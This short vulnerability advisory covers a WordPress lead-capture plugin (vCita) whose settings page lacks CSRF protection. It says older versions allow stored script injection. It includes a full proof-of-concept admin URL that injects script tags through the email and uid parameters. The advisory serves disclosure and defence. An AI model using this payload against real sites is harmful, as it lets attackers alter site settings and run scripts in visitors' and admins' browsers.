The plugin does not protect its settings page against CSRF attacks, allowing an unauthenticated attacker to change the plugin’s settings, and on older versions (<= 2.6.4), inject arbitrary web-scripts, by tricking a logged in user with the contributor role or higher to click a link.
https://example.com/wp-admin/admin.php?page=lead-capturing-call-to-actions-by-vcita/vcita-callback.php&success=true&first_name=a-a&last_name=b&title=c&confirmation_token=d&confirmed=true&engage_delay=1&implementation_key=1&email=a“/><script>alert(1);</script>&uid=a”</script><script>alert(2);</script>